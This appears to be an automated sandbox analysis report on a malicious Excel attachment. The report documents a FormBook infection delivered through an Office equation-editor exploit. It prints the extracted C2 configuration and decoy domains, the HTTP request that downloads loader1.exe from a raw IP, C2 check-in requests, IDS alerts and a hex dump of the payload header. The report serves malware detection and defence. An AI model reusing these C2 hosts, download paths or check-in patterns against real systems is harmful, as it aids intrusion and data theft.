Analysis Report Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx

AV Detection:

Found malware configuration

Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe	ReversingLabs: Detection: 28%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx	Virustotal: Detection: 25%			Perma Link
Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx	ReversingLabs: Detection: 21%

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.vbc.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.9760000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.raserver.exe.2477960.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.raserver.exe.739160.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: RAServer.pdb^ source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp

Spreading:

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E61 FindFirstFileA,FindClose,		4_2_00405E61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_0040548B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040263E FindFirstFileA,		4_2_0040263E

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 60MB

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop esi		5_2_00415851
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx		5_2_00406A98
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop esi		7_2_00095851
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop ebx		7_2_00086A99

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.reufhroir.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.210.173.40:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 192.210.173.40:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 67.199.248.12:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 67.199.248.12:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 67.199.248.12:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.oceancollaborative.com/bp3i/

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 06:03:41 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 10 Jun 2021 15:14:59 GMTETag: "36f99-5c46adac1699a"Accept-Ranges: bytesContent-Length: 225177Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /bp3i/?k48p3Xk8=UA97/2DMKKyqmOEzj5VkqIpiqoWZJQJaus3zswYLrPQqMJGDrodJLRvFW8FHFce0tipUDw==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.spinecompanion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bp3i/?k48p3Xk8=/O9fLU9aKIl5h5wJhcQBjfSEDJBN8B2QQZuj7hhytBKbSIIxNnTjzWGkziBiUBwkg6nLBQ==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 217.70.184.50 217.70.184.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E25AB663.emf

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.210.173.40Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bp3i/?k48p3Xk8=UA97/2DMKKyqmOEzj5VkqIpiqoWZJQJaus3zswYLrPQqMJGDrodJLRvFW8FHFce0tipUDw==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.spinecompanion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bp3i/?k48p3Xk8=/O9fLU9aKIl5h5wJhcQBjfSEDJBN8B2QQZuj7hhytBKbSIIxNnTjzWGkziBiUBwkg6nLBQ==&e6A=3fptojvPVN1xy HTTP/1.1Host: www.doodstore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Found strings which match to known social media urls

Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.reufhroir.com

URLs found in memory or binary data

Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: vbc.exe, vbc.exe, 00000004.00000002.2140747061.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2135914914.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.2140747061.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2135914914.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: vbc.exe, 00000004.00000002.2141535584.0000000002160000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2145283595.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
